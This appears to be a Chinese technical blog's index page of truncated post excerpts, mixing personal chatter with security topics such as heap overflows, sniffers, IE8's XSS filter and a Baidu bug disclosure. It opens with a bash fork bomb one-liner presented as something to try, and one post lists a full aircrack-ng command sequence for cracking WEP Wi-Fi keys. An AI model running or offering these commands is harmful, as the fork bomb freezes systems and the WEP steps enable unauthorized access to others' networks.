:() { :|:& }; :

就上面这个，先保存好文件，sync了再试。
类别：犁牛磕死 linux 查看评论

南京前几天还23度，今天实际温度已直逼37度了，这日子可怎么过啊。

今天本来想扯下淡的，但天气一热脑袋发晕，写出来全是错别字，而且文法还不通，所以写到500字又删掉了。删干净后躲到走廊打了个电话给我妈说我都想满地打滚了，我妈居然说没问题，但是衣服难洗，建议先脱光再滚，我一ft脑袋差点把走廊窗户的玻璃给砸碎了。

怎么办呢，暂时扯不动了，需要补充点。人家说厚积薄发，看30万字能喷3千字就不错了，我还是决定回去读会儿尼采——这种鸟天气只有读让你上火的东西才能暂时忘却周围的温度。这期

阅读全文
类别：默认分类 查看评论

在用户空间中可以用如下方法得到：

1. 从 System.map 文件直接得到地址。
   例如，要得到 do_fork 的地址，可以在命令行执行 $grep do_fork /usr/src/linux/System.map 。
2. 使用 nm 命令。
   $nm vmlinuz |grep do_fork
3. 从 /proc/kallsyms 文件获得地址。
   $cat /proc/kallsyms |grep do_fork

在2.6较早的版本中可以用kallsyms_lookup_name()来查找， 但是在我得2.6.18中好像没有导出。

贴一下wnps0.26中使用的方法， 阅读全文
类别：默认分类 查看评论

类别：默认分类 查看评论

一个OEM版的网卡和一个小锅盖 ：） BT3下最简单的破64位WEP的命令： macchanger -m 00:11:22:33:44:55 rausb0 airmon-ng start rasub0 6 airodump-ng –ivs -w nn -c 6 rausb0 aireplay-ng -1 0 -a [APMAC] -h 001122334455 rausb0 aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -h 001122334455 -b rausb0 aircrack-ng -n 64 *.ivs

ubuntu源的pidgin终于更新到了2.4.3了。终于补了让人恼火的输入框crash的bug。。。。。。
类别：奇技淫巧 查看评论

7月份生日真多啊。

向各位已奔赴米国的大牛（及夫人），还有即将奔赴米国的大牛（及夫人）问好。你们在万恶的资本主义国家里，坚持传播我们的主义思想和理论，为解放全世界被压迫的人民做出的贡献，俺个人是不会忘记的。俺代表俺女朋友，以及俺两位周围三五米内的各种机械设备，向你们，并通过你们向你们周围三五米内的各种有机物致以崇高的敬意和热切的问候，oh yeah~

类别：默认分类 查看评论

说了刘邦和项羽

项羽军事能力过人，计谋出众，但是最后败在刘邦手下。

反观刘邦计谋二流，军事二流，说二流都是看的起他，但是却打败了刘邦。那位老师归结了几点

会听 不仅会听的，马上实施。还要在没有人献计的时候去主动问“为之奈何”

会用人 将手下的能人派到最合适的位置

会赏罚 舍得赏罚

项羽就是一盘辣椒太辣了，不适合太多人。而刘邦是一瓢无色无位的水，适合所有人

所以刘邦是个好领导

类别：胡言乱语 查看评论

如何评测一个软件系统的安全性

http://code.google.com/p/chtml/

一个很有中国特色的项目，哈哈，谁说学计算机的都太死板来着？

启用了ASLR,NX,安全了一些吧.


类别：Security 查看评论

http://code.google.com/p/chtml/

比汉编强多了...
类别：技术八卦 查看评论

http://topic.csdn.net/t/20010508/19/115126.html

一个简单的游戏算法？谁知道？

比如拼图游戏：
给出一个随机的布局（例如）
|06|14|03|13|
|05|01|08|15|
|11|10|09|12|
|04|02| |07|
空的一个是可以移动的地方，相邻的方格

阅读全文
类别：游戏 查看评论

sniffer原理

袁哥 < yuange@163.net >

   

    大家经常讨论SNIFFER，觉得还是很多人没有真正理解SNIFFER，所以把我的一点理解写出来大家共享。

    先讲讲HUB的工作原理吧。由于以太网等很多网络（常见共享HUB连接的内部网）是基于总线方式，

物理上是广播的，就是一个机器发给另一个机器的数据，共享HUB先收到然后把它接收到的数据再发给别

的（

阅读全文
类别：文章 查看评论

堆溢出的研究

作者：袁哥 <mailto:yuange@nsfocus.com>
主页：http://www.nsfocus.com
日期：2002-09-16

实在无聊，贴点新东西，不过最后一点做了处理。程序代码嘛，就不能帖了。其实堆溢出同样是需要解决溢出的三要点，溢出点确定，定位shellcode，跳转到shellcode。UNIX版下面的《高级format string exploit技术P59-0x07(上)》 http://bbs.nsfocus.com/index.php?act=ST&f=2&t=137798

阅读全文
类别：溢出 查看评论

http://blogs.technet.com/feliciano_intini/pages/microsoft-blogs-and-web-resources-about-security.aspx

     摘要:
多猫杀图，务必小心
....

  阅读全文

    我很小的时候思考过这样一个问题：如果遭到一个你绝无可能循正常途径对抗的，极其强大的对手的欺负，怎么办？和所有的小孩子一样，我希望从母亲那里获得答案，她是这么告诉我的：遇到什么事情回来告诉爸爸妈妈，不要自己乱来！

    后来上了中学，先后学过两篇课文，《廉颇蔺相如列传》和《唐雎不辱使命》，大家一定多少还有印象。

    蔺相如是赵国人。赵国弱，但是赵国人并不好惹。韩愈说“燕赵多 阅读全文
类别：花园里的猫 cat in the garden 查看评论

IE一更新，国内媒体就鸡飞狗跳了

我们姑且来看看
http://www.cnbeta.com/articles/59423.htm

阅读全文
类别：象牙塔 查看评论

其实我更为看重这篇blog：
http://blogs.msdn.com/ie/archive/2008/07/02/ie8-security-part-v-comprehensive-protection.aspx

Eric Lawrence在此文中提到了IE8里的深度防御，也让我们初次剖析了IE 8的安全架构。

IE 8里分别从三个方面防护

Web应用防护：
有上篇说的 XSSFilter
除此之外，还有很重要的特性就是：

Html Sanitization 和 JSON Sanitization

就如示例代码中的一样，跨域调用html和请求页面，脚本会被过滤掉

阅读全文
类别：象牙塔 查看评论

两则好故事，感谢冥冥中上天的安排，让我看到这么多值得学习的东西。

故事1:屈臣氏蒸馏水故事--品牌是怎么做出来的？

Coolc最近喝屈臣氏蒸馏水的时候，突然想到，这种水那么贵是否会有假冒呢？我应该怎么识别呢？就到屈臣氏蒸馏水的香港主页发了一封Mail。周日发的Mail，然后……

1、周一上午九点，收到深圳分部的电话，告知我熟

阅读全文
类别：业界感悟 查看评论

今天全世界像疯了一样，因为IE blog上更新的三篇blog而疯。

几乎大部分的IT网站都转载了IE的安全更新。

首先最 引人瞩目的是：XSSFilter

这个特性是在BETA2中加入的。

目前从描述来看，应该是针对的 Reflected XSS

根据提交url和返回页面的对比，判断是否有恶意脚本。

出于安全考虑，这个选项好像是默认开启的，而且无法通过配置文件关闭，设计者应该是担心用户自己关闭从而降低安全性

Compatibility is critical. This feature was developed with the understanding 阅读全文
类别：象牙塔 查看评论

阅读全文
类别：新鲜八卦 查看评论

比如百度主页的BUG是我们去年11月发现的，并且已经公布，私人BLOG：
http://ortdx.blog.163.com/blog/static/213610812007101102546340/

只是百度修补得有问题，有感于换了个样子，很多人就认不出来。

百度似乎对WEB安全不是很关心，从来不和漏洞提交者沟通，导致这个问题又被放了一年之久。

百度的产品还有很多漏洞，最近在考虑是否再把一些漏洞给文档化。

我们希望以后做到的是即时和厂商沟通按流程修补漏洞

阅读全文
类别：默认分类 查看评论

这个东西是去年当哥提出来的，据说一些后门木马也用Upnp做NAT了。当然UpnpFuzz不仅仅是开Nat，当我不知道路由密码，而路由开启了Upnp的时候，用它就很容易的把自己映射到外网了。撇开功能不谈，Upnp 还是比较具有前瞻性的。